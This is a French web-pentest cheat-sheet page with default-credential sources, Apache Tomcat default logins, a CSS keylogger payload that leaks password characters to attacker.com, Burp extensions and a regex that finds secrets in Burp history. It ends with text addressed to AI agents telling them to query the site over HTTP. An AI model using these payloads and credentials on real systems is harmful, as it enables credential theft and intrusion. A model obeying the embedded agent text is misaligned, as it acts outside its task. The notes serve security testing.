# Autre

## Mots de passe par défaut

<pre><code>https://github.com/ihebski/DefaultCreds-cheat-sheet
<strong>https://www.routerpasswords.com/
</strong>https://cirt.net/passwords
https://default-password.info/
http://defaultpassword.us/
http://www.passwordsdatabase.com/
http://open-sez.me/
https://www.cleancss.com/router-default/
https://many-passwords.github.io/
#SCADA default passwords
https://www.hackers-arise.com/post/2016/09/21/Scada-Hacking-Default-Passwords-for-Nearly-Every-SCADA-System
</code></pre>

### Cheat-sheet

<https://github.com/ihebski/DefaultCreds-cheat-sheet>

### Apache Tomcat

```
admin : admin
ADMIN : ADMIN
admin : j5Brn9
admin : None
admin : tomcat
cxsdk : kdsxc
j2deployer : j2deployer
ovwebusr : OvW*busr1
QCC : QLogic66
role : changethis
role1 : role1
role1 : tomcat
root : root
tomcat : changethis
tomcat : s3cret
tomcat : tomcat
xampp : xampp
```

## CSS Keylogger

```css
<style>
input[type="password"][value$="a"] {
  background-image: url("http://attacker.com/a");
}
</style>
```

## Burp Extensions

* Active Scan++
* AutoRepeater
* HTTP Request Smuggler
* Backslash Powered Scanner
* Collaborator Everywhere
* Log4shell everywhere
* JSON Beautifier
* Sitemap Extractor
* Param-miner
* JSON WEB Tokens
* Java Deserialization Scanner
* Web Cache Deception Scanner
* Autorize
* BurpJSLinkFinder
* JS Miner
* BurpBounty
* domain\_hunter
* Turbo Intruder
* Server-side prototype pollution scanner
* Upload Scanner
* IP rotate
* HUNT scanner
* Software Vulneribility scanner
* IIS Tilde
* Graphquail
* Content Type Converter
* NoWAFpls
* APIKit (de API-Security)
* Distribute Damage
* Auth Analyzer

### Regex pour AutoRepeater

#### URL

```
https?://(www.)?[-a-zA-Z0–9@:%.+~#=]{1,256}.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%+.~#?&//=]*)
```

### Regex pour filtrage des requêtes interessantes dans burp history

```
(?i)([a-z0-9]+){0,}((_|-){0,}(\\s){0,})(key|pass|credentials|auth|cred|creds|secret|password|access|token|api)(\\s){0,}(=|:|is|>){1,}
```

## Information disclosure

information disclosure à partir d'une manipulation d'en-tête:

```
Accept: application/json, text/javascript, */*, p=0.01
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.s1rn3tz.ovh/pentest-web/autre.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.